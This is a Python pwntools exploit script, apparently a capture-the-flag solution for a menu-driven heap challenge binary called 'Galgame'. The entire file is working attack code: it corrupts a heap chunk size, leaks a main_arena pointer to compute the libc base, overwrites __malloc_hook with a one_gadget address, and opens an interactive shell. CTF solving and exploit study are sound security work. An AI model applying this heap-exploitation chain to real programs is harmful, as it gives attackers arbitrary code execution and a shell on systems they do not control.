from pwn import *
#context.log_level = 'debug'

# Target process plus the two ELF images the script reads symbols from.
# `e` is loaded here but not referenced anywhere below in this script.
p = process(['./Galgame'])
e = ELF('./Galgame', checksec=True)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=True)

def send_gift():
    """Choose menu entry 1 once the '>> ' prompt has been consumed."""
    p.recvuntil('>> ')
    p.sendline('1')

def invite(index, name):
    """Choose menu entry 2, then answer the index and movie-name prompts.

    `index` is sent as a decimal line; `name` is sent raw (no newline appended),
    so the caller controls the exact bytes written after 'movie name >> '.
    """
    p.recvuntil('>> ')
    p.sendline('2')
    p.recvuntil('idx >> ')
    p.sendline(str(index))
    p.recvuntil('movie name >> ')
    p.send(name)

def confess():
    """Choose menu entry 3 once the '>> ' prompt has been consumed."""
    p.recvuntil('>> ')
    p.sendline('3')

def collection():
    """Choose menu entry 4 once the '>> ' prompt has been consumed."""
    p.recvuntil('>> ')
    p.sendline('4')

def bye(content):
    """Choose menu entry 5, then write `content` raw after the farewell prompt.

    `content` is sent without a trailing newline, as with invite()'s name.
    """
    p.recvuntil('>> ')
    p.sendline('5')
    p.recvuntil("Hotaru: Won't you stay with me for a while? QAQ")
    p.send(content)

#gdb.attach(p,'b *0x40129B')
#x /16xg 0x404060
#x /16xg 0x404098

# Interaction sequence; every call below drives the running process `p`.
send_gift()
invite(0, b'a' * 0x8 + p64(0xf91))
confess()
send_gift()
collection()

# Read the 6-byte little-endian value the program prints after '1: ',
# widen it to a full integer and apply the fixed adjustment.
p.recvuntil('1: ')
main_arena_addr = int.from_bytes(p.recvn(6), 'little') - 1640
# NOTE(review): 1640 and 0xf1247 are offsets tied to one particular libc
# build; they have to be re-derived for any other libc before the
# arithmetic below is meaningful.
libc_offset = main_arena_addr - 0x10 - libc.symbols['__malloc_hook']
one_gadget = libc_offset + 0xf1247
print(f"{main_arena_addr:#x}")

bye(p64(main_arena_addr - 0x10 - 0x60))  # __malloc_hook
invite(8, p64(one_gadget) + p64(0))
send_gift()

p.interactive()